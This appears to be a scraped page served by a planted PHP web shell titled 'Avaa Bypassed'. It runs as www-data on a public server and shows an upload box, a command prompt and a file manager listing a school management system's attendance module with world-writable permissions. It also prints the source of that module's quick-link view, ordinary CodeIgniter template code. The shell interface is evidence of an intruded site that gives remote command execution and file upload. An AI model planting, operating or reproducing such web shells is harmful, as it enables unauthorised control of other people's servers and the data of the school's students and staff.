[ Avaa Bypassed ]




Upload:

Command:

www-data@18.216.156.171: ~ $
 <span><?php echo $this->lang->line('quick_link'); ?>:</span>
<?php if(has_permission(VIEW, 'attendance', 'student')){ ?>
    <a href="<?php echo site_url('attendance/student/index'); ?>"><?php echo $this->lang->line('student_attendance'); ?></a>
<?php } ?>
 <?php if(has_permission(VIEW, 'attendance', 'teacher')){ ?>
   | <a href="<?php echo site_url('attendance/teacher/index'); ?>"><?php echo $this->lang->line('teacher_attendance'); ?></a>
<?php } ?>
<?php if(has_permission(VIEW, 'attendance', 'employee')){ ?>
   | <a href="<?php echo site_url('attendance/employee/index'); ?>"><?php echo $this->lang->line('employee_attendance'); ?></a>                    
<?php } ?>
<?php if(has_permission(VIEW, 'attendance', 'absentemail')){ ?>
   | <a href="<?php echo site_url('attendance/absentemail/index'); ?>"><?php echo $this->lang->line('absent_email'); ?></a>                    
<?php } ?>
<?php if(has_permission(VIEW, 'attendance', 'absentsms')){ ?>
   | <a href="<?php echo site_url('attendance/absentsms/index'); ?>"><?php echo $this->lang->line('absent_sms'); ?></a>                    
<?php } ?>

Filemanager

Name Type Size Permission Actions
employee Folder 0777
mail Folder 0777
sms Folder 0777
student Folder 0777
teacher Folder 0777
index.html File 131 B 0777
quick-link.php File 1.08 KB 0777